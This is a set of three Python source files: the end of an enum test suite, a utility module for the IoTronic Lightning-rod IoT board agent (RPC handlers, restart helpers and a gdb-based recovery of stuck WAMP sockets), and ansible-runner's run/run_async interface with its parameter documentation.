    # check that only 248 members were created
    # (identity-keyed set: 8 named + 248 composites == 256 unique objects,
    # so duplicates would push the count above 256)
    self.assertFalse(
        failed,
        'at least one thread failed while creating composite members')
    self.assertEqual(256, len(seen), 'too many composite members created')
class TestEmptyAndNonLatinStrings(unittest.TestCase):
    """Member-name validation: empty names rejected, non-Latin names allowed."""

    def test_empty_string(self):
        # An empty member name is invalid and must raise ValueError.
        with self.assertRaises(ValueError):
            Enum('empty_abc', ('', 'B', 'C'))

    def test_non_latin_character_string(self):
        # Greek letters are valid identifiers and usable as member names.
        enumeration = Enum('greek_abc', ('\u03B1', 'B', 'C'))
        member = getattr(enumeration, '\u03B1')
        self.assertEqual(member.value, 1)

    def test_non_latin_number_string(self):
        # Hebrew aleph also works; reachable via getattr.
        enumeration = Enum('hebrew_123', ('\u05D0', '2', '3'))
        member = getattr(enumeration, '\u05D0')
        self.assertEqual(member.value, 1)
class TestUnique(unittest.TestCase):
    """Tests for the @unique decorator, which rejects aliased values."""
    def test_unique_clean(self):
        # All values distinct: @unique must accept these definitions.
        @unique
        class Clean(Enum):
            one = 1
            two = 'dos'
            tres = 4.0
        @unique
        class Cleaner(IntEnum):
            single = 1
            double = 2
            triple = 3
    def test_unique_dirty(self):
        # Duplicate values: the ValueError message names alias -> target.
        with self.assertRaisesRegex(ValueError, 'tres.*one'):
            @unique
            class Dirty(Enum):
                one = 1
                two = 'dos'
                tres = 1
        with self.assertRaisesRegex(
                ValueError,
                'double.*single.*turkey.*triple',
                ):
            @unique
            class Dirtier(IntEnum):
                single = 1
                double = 1
                triple = 3
                turkey = 3
    def test_unique_with_name(self):
        # 'name' and 'value' are permitted as member names under @unique.
        @unique
        class Silly(Enum):
            one = 1
            two = 'dos'
            name = 3
        @unique
        class Sillier(IntEnum):
            single = 1
            name = 2
            triple = 3
            value = 4
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumMeta:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
    """Enums must cooperate with stdlib introspection (pydoc, inspect)."""

    maxDiff = None

    class Color(Enum):
        red = 1
        green = 2
        blue = 3

    def test_pydoc(self):
        # indirectly test __objclass__
        # StrEnum here is a helper defined elsewhere in this module; its
        # __doc__ being None means docstrings were stripped (-OO).
        if StrEnum.__doc__ is None:
            expected_text = expected_help_output_without_docs % __name__
        else:
            expected_text = expected_help_output_with_docs % __name__
        output = StringIO()
        helper = pydoc.Helper(output=output)
        helper(self.Color)
        result = output.getvalue().strip()
        self.assertEqual(result, expected_text)

    def test_inspect_getmembers(self):
        """inspect.getmembers must see members, name/value descriptors, etc."""
        values = dict((
                ('__class__', EnumMeta),
                ('__doc__', 'An enumeration.'),
                ('__members__', self.Color.__members__),
                ('__module__', __name__),
                ('blue', self.Color.blue),
                ('green', self.Color.green),
                ('name', Enum.__dict__['name']),
                ('red', self.Color.red),
                ('value', Enum.__dict__['value']),
                ))
        result = dict(inspect.getmembers(self.Color))
        self.assertEqual(values.keys(), result.keys())
        failed = False
        for k in values.keys():
            if result[k] != values[k]:
                # Print a detailed diff for each mismatched attribute
                # before failing, to ease debugging.
                print()
                print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
                        ('=' * 75, k, result[k], values[k], '=' * 75), sep='')
                failed = True
        if failed:
            self.fail("result does not equal expected, see print above")

    def test_inspect_classify_class_attrs(self):
        # indirectly test __objclass__
        from inspect import Attribute
        values = [
                Attribute(name='__class__', kind='data',
                    defining_class=object, object=EnumMeta),
                Attribute(name='__doc__', kind='data',
                    defining_class=self.Color, object='An enumeration.'),
                Attribute(name='__members__', kind='property',
                    defining_class=EnumMeta, object=EnumMeta.__members__),
                Attribute(name='__module__', kind='data',
                    defining_class=self.Color, object=__name__),
                Attribute(name='blue', kind='data',
                    defining_class=self.Color, object=self.Color.blue),
                Attribute(name='green', kind='data',
                    defining_class=self.Color, object=self.Color.green),
                Attribute(name='red', kind='data',
                    defining_class=self.Color, object=self.Color.red),
                Attribute(name='name', kind='data',
                    defining_class=Enum, object=Enum.__dict__['name']),
                Attribute(name='value', kind='data',
                    defining_class=Enum, object=Enum.__dict__['value']),
                ]
        # Compare in a deterministic (name-sorted) order.
        values.sort(key=lambda item: item.name)
        result = list(inspect.classify_class_attrs(self.Color))
        result.sort(key=lambda item: item.name)
        failed = False
        for v, r in zip(values, result):
            if r != v:
                print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
                failed = True
        if failed:
            self.fail("result does not equal expected, see print above")
class MiscTestCase(unittest.TestCase):
    def test__all__(self):
        # Verify enum.__all__ lists exactly the module's public names.
        support.check__all__(self, enum)
# Module-level constants consumed by TestIntEnumConvert below via the
# `filter=lambda x: x.startswith('CONVERT_TEST_')` argument of _convert_.
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5  # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
    """Tests for IntEnum._convert_, which builds an enum from module constants."""
    def test_convert_value_lookup_priority(self):
        test_type = enum.IntEnum._convert_(
                'UnittestConvert',
                # pick the source module name depending on how tests were invoked
                ('test.test_enum', '__main__')[__name__=='__main__'],
                filter=lambda x: x.startswith('CONVERT_TEST_'))
        # We don't want the reverse lookup value to vary when there are
        # multiple possible names for a given value.  It should always
        # report the first lexicographical name in that case.
        self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
    def test_convert(self):
        test_type = enum.IntEnum._convert_(
                'UnittestConvert',
                ('test.test_enum', '__main__')[__name__=='__main__'],
                filter=lambda x: x.startswith('CONVERT_TEST_'))
        # Ensure that test_type has all of the desired names and values.
        self.assertEqual(test_type.CONVERT_TEST_NAME_F,
                         test_type.CONVERT_TEST_NAME_A)
        self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
        self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
        self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
        self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
        # Ensure that test_type only picked up names matching the filter.
        self.assertEqual([name for name in dir(test_type)
                          if name[0:2] not in ('CO', '__')],
                         [], msg='Names other than CONVERT_TEST_* found.')
    @unittest.skipUnless(sys.version_info[:2] == (3, 8),
                         '_convert was deprecated in 3.8')
    def test_convert_warn(self):
        # On 3.8 only: the old spelling still works but warns.
        with self.assertWarns(DeprecationWarning):
            enum.IntEnum._convert(
                'UnittestConvert',
                ('test.test_enum', '__main__')[__name__=='__main__'],
                filter=lambda x: x.startswith('CONVERT_TEST_'))
    @unittest.skipUnless(sys.version_info >= (3, 9),
                         '_convert was removed in 3.9')
    def test_convert_raise(self):
        # On 3.9+: the old spelling is gone entirely.
        with self.assertRaises(AttributeError):
            enum.IntEnum._convert(
                'UnittestConvert',
                ('test.test_enum', '__main__')[__name__=='__main__'],
                filter=lambda x: x.startswith('CONVERT_TEST_'))
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
utils.py | # Copyright 2017 MDSLAB - University of Messina
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__author__ = "Nicola Peditto <n.peditto@gmail.com>"
import asyncio
import pkg_resources
from six import moves
from stevedore import extension
from threading import Timer
import os
import psutil
import subprocess
import sys
import threading
import time
import signal
from iotronic_lightningrod.common import utils
from iotronic_lightningrod.config import entry_points_name
from iotronic_lightningrod.modules import Module
from iotronic_lightningrod.modules import utils as lr_utils
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
global connFailureRecovery
connFailureRecovery = None
global gdbPid
gdbPid = None
class Utility(Module.Module):
    """IoTronic "Utility" Lightning-rod module exposing board-management RPCs."""

    def __init__(self, board, session):
        super(Utility, self).__init__("Utility", board)
        # WAMP session, used to force a reconnect after loading new modules.
        self.session = session

    def finalize(self):
        # Nothing to set up after module registration.
        pass

    def restore(self):
        # Nothing to restore on reconnection.
        pass

    async def hello(self, req_id, client_name, message, parameters=None):
        """Connectivity probe: echo the caller's message after a random
        0.5-3.0s delay and return a greeting including the delay used.
        """
        rpc_name = utils.getFuncName()
        LOG.info("RPC " + rpc_name + " CALLED [req_id: " + str(req_id) + "]:")
        if parameters is not None:
            LOG.info(" - " + rpc_name + " parameters: " + str(parameters))

        import random
        s = random.uniform(0.5, 3.0)
        await asyncio.sleep(s)

        result = "Hello by board to Conductor " + client_name + \
                 " that said me " + message + " - Time: " + '%.2f' % s
        LOG.info("DEVICE hello result: " + str(result))
        return result

    async def plug_and_play(self, req_id, new_module, new_class,
                            parameters=None):
        """Register a new LR module in the entry-points file, reload the
        's4t.modules' namespace and disconnect so LR restarts with it.
        """
        rpc_name = utils.getFuncName()
        LOG.info("RPC " + rpc_name + " CALLED [req_id: " + str(req_id) + "]:")
        if parameters is not None:
            LOG.info(" - " + rpc_name + " parameters: " + str(parameters))

        LOG.info("LR modules loaded:\n\t" + new_module)

        # Updating entry_points
        # NOTE(review): appended without a newline separator -- assumes the
        # file already ends with one; confirm.
        with open(entry_points_name, 'a') as entry_points:
            entry_points.write(
                new_module +
                '= iotronic_lightningrod.modules.' + new_module + ':'
                + new_class
            )

        # Reload entry_points
        refresh_stevedore('s4t.modules')
        LOG.info("New entry_points loaded!")

        # Reading updated entry_points
        named_objects = {}
        for ep in pkg_resources.iter_entry_points(group='s4t.modules'):
            named_objects.update({ep.name: ep.load()})

        # BUGFIX: the previous code did `await named_objects`, which raises
        # TypeError at runtime because a dict is not awaitable; the loaded
        # entry points need no awaiting.
        self.session.disconnect()

        return str(named_objects)

    async def changeConf(self, req_id, conf, parameters=None):
        """Apply a new board configuration pushed by IoTronic."""
        rpc_name = utils.getFuncName()
        LOG.info("RPC " + rpc_name + " CALLED [req_id: " + str(req_id) + "]:")
        if parameters is not None:
            LOG.info(" - " + rpc_name + " parameters: " + str(parameters))

        await self.board.getConf(conf)
        self.board.setUpdateTime()

        result = "Board configuration changed!"
        LOG.info("PROVISIONING RESULT: " + str(result))
        return result

    async def destroyNode(self, req_id, conf, parameters=None):
        """Reset the board configuration (de-provision this node)."""
        rpc_name = utils.getFuncName()
        LOG.info("RPC " + rpc_name + " CALLED [req_id: " + str(req_id) + "]:")
        if parameters is not None:
            LOG.info(" - " + rpc_name + " parameters: " + str(parameters))

        await self.board.setConf(conf)

        result = "Board configuration cleaned!"
        LOG.info("DESTROY RESULT: " + str(result))
        return result
def refresh_stevedore(namespace=None):
    """Force a reload of pkg_resources entry points.

    Useful for dynamic loading/unloading of stevedore modules.  When a
    namespace is given only that cache entry is dropped; otherwise the
    whole stevedore cache is cleared.
    """
    # NOTE(sheeprine): reloading pkg_resources on python3 would re-execute
    # python2-only code because `basestring` survives the reload; delete it
    # first so the reload takes the python3 path.
    try:
        del sys.modules['pkg_resources'].basestring
    except AttributeError:
        pass  # python2: the attribute never existed, nothing to do
    # Reload the module so its working_set is rebuilt from scratch.
    moves.reload_module(sys.modules['pkg_resources'])
    # Invalidate stevedore's extension-manager cache.
    ep_cache = extension.ExtensionManager.ENTRY_POINT_CACHE
    if not namespace:
        ep_cache.clear()
    elif namespace in ep_cache:
        del ep_cache[namespace]
def LR_restart_delayed(seconds):
    """Restart Lightning-rod after `seconds` (clamped to a 3s minimum).

    The wait happens on a worker thread; the restart replaces the current
    process image via os.execl.
    """
    try:
        seconds = max(seconds, 3)
        LOG.warning("Lightning-rod restarting in "
                    + str(seconds) + " seconds...")

        def delayLRrestarting():
            # Sleep off-thread, then re-exec the interpreter with the
            # same argv so LR starts fresh.
            time.sleep(seconds)
            interpreter = sys.executable
            os.execl(interpreter, interpreter, *sys.argv)

        threading.Thread(target=delayLRrestarting).start()
    except Exception as err:
        LOG.error("Lightning-rod restarting error: " + str(err))
def LR_restart():
    """Restart Lightning-rod immediately by re-exec'ing the interpreter."""
    try:
        LOG.warning("Lightning-rod restarting in few seconds...")
        interpreter = sys.executable
        # Replace the current process image; argv is preserved.
        os.execl(interpreter, interpreter, *sys.argv)
    except Exception as err:
        LOG.error("Lightning-rod restarting error: " + str(err))
def destroyWampSocket():
    """Forcibly close this process's zombie WAMP websocket via gdb.

    Attaches gdb to the current process and calls shutdown() on the file
    descriptor whose remote port is 8181.  Two watchdog Timers restart LR
    if the recovery as a whole, or gdb itself, hangs; both are cancelled on
    success.  Any failure falls back to a full LR restart.
    """
    global connFailureRecovery
    global gdbPid
    LR_PID = os.getpid()
    # IDIOM: compare to None with `is not None` (was `!= None`).
    if connFailureRecovery is not None:
        LOG.info(
            "WAMP Connection Recovery timer: CLEANED."
        )
        connFailureRecovery.cancel()

    def timeout():
        # Fired when the whole recovery took longer than 30s.
        LOG.warning("WAMP Connection Recovery timer: EXPIRED")
        lr_utils.LR_restart()

    def timeoutGDB():
        # Fired when gdb itself hangs: kill it, then restart LR.
        LOG.warning("WAMP Connection Recovery GDB timer: EXPIRED")
        os.kill(gdbPid, signal.SIGKILL)
        LOG.warning("WAMP Connection Recovery GDB process: KILLED")
        LOG.warning("WAMP Connection Recovery GDB process: LR restarting...")
        lr_utils.LR_restart()

    connFailureRecovery = Timer(30, timeout)
    connFailureRecovery.start()
    LOG.warning("WAMP Connection Recovery timer: STARTED")
    try:
        gdbTimeoutCheck = Timer(30, timeoutGDB)
        gdbTimeoutCheck.start()
        LOG.debug("WAMP Connection Recovery GDB timer: STARTED")
        process = subprocess.Popen(
            ["gdb", "-p", str(LR_PID)],
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE
        )
        gdbPid = process.pid
        proc = psutil.Process()
        conn_list = proc.connections()
        proc_msg = "WAMP RECOVERY: " + str(conn_list)
        print(proc_msg)
        LOG.info(proc_msg)
        wamp_conn_set = False
        for socks in conn_list:
            if socks.raddr != ():
                # NOTE(review): assumes the WAMP router listens on port
                # 8181 -- confirm against the board configuration.
                if socks.raddr.port == 8181:
                    socks_msg = "FD selected: " + str(socks.fd) \
                                + " [port " + str(socks.raddr.port) + "]"
                    print(socks_msg)
                    LOG.info(socks_msg)
                    ws_fd = socks.fd
                    # Build the gdb script: call shutdown(<fd>, 0), quit,
                    # and confirm detaching from the process.
                    first = b"call ((void(*)()) shutdown)("
                    fd = str(ws_fd).encode('ascii')
                    last = b"u,0)\nquit\ny"
                    commands = b"%s%s%s" % (first, fd, last)
                    process.communicate(input=commands)
                    msg = "Websocket-Zombie closed! Restoring..."
                    LOG.warning(msg)
                    print(msg)
                    # WAMP connection found!
                    wamp_conn_set = True
        LOG.info(
            "WAMP Connection Recovery timer: CANCELLED."
        )
        connFailureRecovery.cancel()
        gdbTimeoutCheck.cancel()
        LOG.debug("WAMP Connection Recovery GDB timer: CLEANED")
        # IDIOM: `not wamp_conn_set` (was `== False`).
        if not wamp_conn_set:
            LOG.warning("WAMP CONNECTION NOT FOUND: LR restarting...")
            # In conn_list there is not the WAMP connection!
            lr_utils.LR_restart()
    except Exception as e:
        LOG.warning("RPC-ALIVE - destroyWampSocket error: " + str(e))
        lr_utils.LR_restart()
def get_socket_info(wport):
    """Return [iface, ip, mac] for the local socket connected to `wport`.

    Scans this process's connections for one whose remote port matches
    `wport`, then matches its local IP against the system interfaces to
    recover the interface name and MAC address.  Returns the sentinel
    string "N/A" when no match is found or on any error.
    """
    sock_bundle = "N/A"
    try:
        for socks in psutil.Process().connections():
            # Skip sockets with no remote endpoint; match the remote port.
            if len(socks.raddr) != 0 and socks.raddr.port == wport:
                lr_net_iface = socks
                print("WAMP SOCKET: " + str(lr_net_iface))
                dct = psutil.net_if_addrs()
                for key in dct.keys():
                    # IDIOM: `not isinstance(...)` (was `== False`).
                    if not isinstance(dct[key], dict):
                        iface = key
                        for elem in dct[key]:
                            ip_addr = elem.address
                            if ip_addr == str(lr_net_iface.laddr.ip):
                                # Same interface as the WAMP socket: read its
                                # link-layer entry to get the MAC address.
                                # NOTE(review): family == 17 is AF_PACKET on
                                # Linux only -- confirm platform assumptions.
                                for snicaddr in dct[iface]:
                                    if snicaddr.family == 17:
                                        lr_mac = snicaddr.address
                                        sock_bundle = [iface, ip_addr,
                                                       lr_mac]
                                        return sock_bundle
        # No matching connection/interface found.
        # (BUGFIX: dropped an unreachable duplicate `return` that followed
        # the except-block's return in the original.)
        return sock_bundle
    except Exception as e:
        LOG.warning("Error getting socket info " + str(e))
        return "N/A"
|
interface.py | # Copyright (c) 2016 Ansible by Red Hat, Inc.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import json
import sys
import threading
import logging
from ansible_runner import output
from ansible_runner.config.runner import RunnerConfig
from ansible_runner.config.command import CommandConfig
from ansible_runner.config.inventory import InventoryConfig
from ansible_runner.config.ansible_cfg import AnsibleCfgConfig
from ansible_runner.config.doc import DocConfig
from ansible_runner.runner import Runner
from ansible_runner.streaming import Transmitter, Worker, Processor
from ansible_runner.utils import (
dump_artifacts,
check_isolation_executable_installed,
santize_json_response
)
logging.getLogger('ansible-runner').addHandler(logging.NullHandler())
def init_runner(**kwargs):
    '''
    Initialize the Runner() instance

    This function will properly initialize both run() and run_async()
    functions in the same way and return a value instance of Runner.

    See parameters given to :py:func:`ansible_runner.interface.run`
    '''
    # If running via the transmit-worker-process method, we must only extract things as read-only
    # inside of one of these commands. That could be either transmit or worker.
    if kwargs.get('streamer') not in ('worker', 'process'):
        dump_artifacts(kwargs)

    if kwargs.get('streamer'):
        # undo any full paths that were dumped by dump_artifacts above in the streamer case
        private_data_dir = kwargs['private_data_dir']
        project_dir = os.path.join(private_data_dir, 'project')

        playbook_path = kwargs.get('playbook') or ''
        if os.path.isabs(playbook_path) and playbook_path.startswith(project_dir):
            kwargs['playbook'] = os.path.relpath(playbook_path, project_dir)

        inventory_path = kwargs.get('inventory') or ''
        if os.path.isabs(inventory_path) and inventory_path.startswith(private_data_dir):
            kwargs['inventory'] = os.path.relpath(inventory_path, private_data_dir)

        roles_path = kwargs.get('envvars', {}).get('ANSIBLE_ROLES_PATH') or ''
        if os.path.isabs(roles_path) and roles_path.startswith(private_data_dir):
            kwargs['envvars']['ANSIBLE_ROLES_PATH'] = os.path.relpath(roles_path, private_data_dir)

    # Logging is configured only when the caller explicitly passes
    # ignore_logging=False (the pop default is True).
    debug = kwargs.pop('debug', None)
    logfile = kwargs.pop('logfile', None)

    if not kwargs.pop("ignore_logging", True):
        output.configure()
        if debug in (True, False):
            output.set_debug('enable' if debug is True else 'disable')
        if logfile:
            output.set_logfile(logfile)

    # Fail fast when process isolation was requested but the container
    # runtime executable (podman by default) is not available.
    if kwargs.get("process_isolation", False):
        pi_executable = kwargs.get("process_isolation_executable", "podman")
        if not check_isolation_executable_installed(pi_executable):
            print(f'Unable to find process isolation executable: {pi_executable}')
            sys.exit(1)

    # Callbacks are popped here so they are not forwarded into the
    # streaming/config constructors below via **kwargs.
    event_callback_handler = kwargs.pop('event_handler', None)
    status_callback_handler = kwargs.pop('status_handler', None)
    artifacts_handler = kwargs.pop('artifacts_handler', None)
    cancel_callback = kwargs.pop('cancel_callback', None)
    finished_callback = kwargs.pop('finished_callback', None)

    streamer = kwargs.pop('streamer', None)
    if streamer:
        # Remote-execution pipeline: transmit -> worker -> process.
        if streamer == 'transmit':
            stream_transmitter = Transmitter(**kwargs)
            return stream_transmitter

        if streamer == 'worker':
            stream_worker = Worker(**kwargs)
            return stream_worker

        if streamer == 'process':
            stream_processor = Processor(event_handler=event_callback_handler,
                                         status_handler=status_callback_handler,
                                         artifacts_handler=artifacts_handler,
                                         cancel_callback=cancel_callback,
                                         finished_callback=finished_callback,
                                         **kwargs)
            return stream_processor

    # Local execution path: build and prepare the runner configuration.
    kwargs.pop('_input', None)
    kwargs.pop('_output', None)
    rc = RunnerConfig(**kwargs)
    rc.prepare()

    return Runner(rc,
                  event_handler=event_callback_handler,
                  status_handler=status_callback_handler,
                  artifacts_handler=artifacts_handler,
                  cancel_callback=cancel_callback,
                  finished_callback=finished_callback)
def run(**kwargs):
    '''
    Run an Ansible Runner task in the foreground and return a Runner object when complete.

    :param private_data_dir: The directory containing all runner metadata needed to invoke the runner
                             module. Output artifacts will also be stored here for later consumption.
    :param ident: The run identifier for this invocation of Runner. Will be used to create and name
                  the artifact directory holding the results of the invocation.
    :param json_mode: Store event data in place of stdout on the console and in the stdout file
    :param playbook: The playbook (either supplied here as a list or string... or as a path relative to
                     ``private_data_dir/project``) that will be invoked by runner when executing Ansible.
    :param module: The module that will be invoked in ad-hoc mode by runner when executing Ansible.
    :param module_args: The module arguments that will be supplied to ad-hoc mode.
    :param host_pattern: The host pattern to match when running in ad-hoc mode.
    :param inventory: Overrides the inventory directory/file (supplied at ``private_data_dir/inventory``) with
                      a specific host or list of hosts. This can take the form of:

                        - Path to the inventory file in the ``private_data_dir``
                        - Native python dict supporting the YAML/json inventory structure
                        - A text INI formatted string
                        - A list of inventory sources, or an empty list to disable passing inventory
    :param roles_path: Directory or list of directories to assign to ANSIBLE_ROLES_PATH
    :param envvars: Environment variables to be used when running Ansible. Environment variables will also be
                    read from ``env/envvars`` in ``private_data_dir``
    :param extravars: Extra variables to be passed to Ansible at runtime using ``-e``. Extra vars will also be
                      read from ``env/extravars`` in ``private_data_dir``.
    :param passwords: A dictionary containing password prompt patterns and response values used when processing output from
                      Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
    :param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
                     be read from ``env/settings`` in ``private_data_dir``.
    :param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
    :param cmdline: Command line options passed to Ansible read from ``env/cmdline`` in ``private_data_dir``
    :param limit: Matches ansible's ``--limit`` parameter to further constrain the inventory to be used
    :param forks: Control Ansible parallel concurrency
    :param verbosity: Control how verbose the output of ansible-playbook is
    :param quiet: Disable all output
    :param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
    :param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
    :param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
    :param timeout: The timeout value in seconds that will be passed to either ``pexpect`` or ``subprocess`` invocation
                    (based on ``runner_mode`` selected) while executing command. If the timeout is triggered it will force cancel the
                    execution.
    :param streamer: Optionally invoke ansible-runner as one of the steps in the streaming pipeline
    :param _input: An optional file or file-like object for use as input in a streaming pipeline
    :param _output: An optional file or file-like object for use as output in a streaming pipeline
    :param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
    :param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
    :param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
    :param status_handler: An optional callback that will be invoked any time the status changes (e.g. started, running, failed, successful, timeout)
    :param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
    :param process_isolation: Enable process isolation, using either a container engine (e.g. podman) or a sandbox (e.g. bwrap).
    :param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
    :param process_isolation_path: Path that an isolated playbook run will use for staging. (default: /tmp)
    :param process_isolation_hide_paths: A path or list of paths on the system that should be hidden from the playbook run.
    :param process_isolation_show_paths: A path or list of paths on the system that should be exposed to the playbook run.
    :param process_isolation_ro_paths: A path or list of paths on the system that should be exposed to the playbook run as read-only.
    :param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
    :param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir. (default: None)
    :param container_options: List of container options to pass to execution engine.
    :param resource_profiling: Enable collection of resource utilization data during playbook execution.
    :param resource_profiling_base_cgroup: Name of existing cgroup which will be sub-grouped in order to measure resource utilization (default: ansible-runner)
    :param resource_profiling_cpu_poll_interval: Interval (in seconds) between CPU polling for determining CPU usage (default: 0.25)
    :param resource_profiling_memory_poll_interval: Interval (in seconds) between memory polling for determining memory usage (default: 0.25)
    :param resource_profiling_pid_poll_interval: Interval (in seconds) between polling PID count for determining number of processes used (default: 0.25)
    :param resource_profiling_results_dir: Directory where profiling data files should be saved (defaults to profiling_data folder inside private data dir)
    :param directory_isolation_base_path: An optional path will be used as the base path to create a temp directory, the project contents will be
                                          copied to this location which will then be used as the working directory during playbook execution.
    :param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
                       This is only used for 'jsonfile' type fact caches.
    :param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
    :param omit_event_data: Omits extra ansible event data from event payload (stdout and event still included)
    :param only_failed_event_data: Omits extra ansible event data unless it's a failed event (stdout and event still included)
    :param check_job_event_data: Check if job events data is completely generated. If event data is not completely generated and if
                                 value is set to 'True' it will raise 'AnsibleRunnerException' exception,
                                 if set to 'False' it logs a debug message and continues execution. Default value is 'False'

    :type private_data_dir: str
    :type ident: str
    :type json_mode: bool
    :type playbook: str or filename or list
    :type inventory: str or dict or list
    :type envvars: dict
    :type extravars: dict
    :type passwords: dict
    :type settings: dict
    :type ssh_key: str
    :type artifact_dir: str
    :type project_dir: str
    :type rotate_artifacts: int
    :type timeout: int
    :type cmdline: str
    :type limit: str
    :type forks: int
    :type quiet: bool
    :type verbosity: int
    :type streamer: str
    :type _input: file
    :type _output: file
    :type event_handler: function
    :type cancel_callback: function
    :type finished_callback: function
    :type status_handler: function
    :type artifacts_handler: function
    :type process_isolation: bool
    :type process_isolation_executable: str
    :type process_isolation_path: str
    :type process_isolation_hide_paths: str or list
    :type process_isolation_show_paths: str or list
    :type process_isolation_ro_paths: str or list
    :type container_image: str
    :type container_volume_mounts: list
    :type container_options: list
    :type resource_profiling: bool
    :type resource_profiling_base_cgroup: str
    :type resource_profiling_cpu_poll_interval: float
    :type resource_profiling_memory_poll_interval: float
    :type resource_profiling_pid_poll_interval: float
    :type resource_profiling_results_dir: str
    :type directory_isolation_base_path: str
    :type fact_cache: str
    :type fact_cache_type: str
    :type omit_event_data: bool
    :type only_failed_event_data: bool
    :type check_job_event_data: bool

    :returns: A :py:class:`ansible_runner.runner.Runner` object, or a simple object containing `rc` if run remotely
    '''
    # Build the Runner (or streaming stage) from kwargs, execute it
    # synchronously, then hand it back so callers can inspect rc/events.
    r = init_runner(**kwargs)
    r.run()
    return r
def run_async(**kwargs):
    '''
    Runs an Ansible Runner task in the background which will start immediately. Returns the thread object and a Runner object.

    This uses the same parameters as :py:func:`ansible_runner.interface.run`

    :returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
    '''
    # Same construction path as run(), but executed on a daemon-less worker
    # thread so the caller gets control back immediately.
    runner = init_runner(**kwargs)
    background_thread = threading.Thread(target=runner.run)
    background_thread.start()
    return background_thread, runner
def init_command_config(executable_cmd, cmdline_args=None, **kwargs):
    '''
    Initialize the Runner() instance

    This function will properly initialize both run_command() and run_command_async()
    functions in the same way and return a value instance of Runner.

    See parameters given to :py:func:`ansible_runner.interface.run_command`
    '''
    # Pull the Runner-level callbacks out of kwargs before they reach
    # CommandConfig, which does not accept them.
    callbacks = {
        name: kwargs.pop(name, None)
        for name in ('event_handler', 'status_handler', 'artifacts_handler',
                     'cancel_callback', 'finished_callback')
    }
    command_config = CommandConfig(**kwargs)
    command_config.prepare_run_command(executable_cmd, cmdline_args=cmdline_args)
    return Runner(command_config,
                  event_handler=callbacks['event_handler'],
                  status_handler=callbacks['status_handler'],
                  artifacts_handler=callbacks['artifacts_handler'],
                  cancel_callback=callbacks['cancel_callback'],
                  finished_callback=callbacks['finished_callback'])
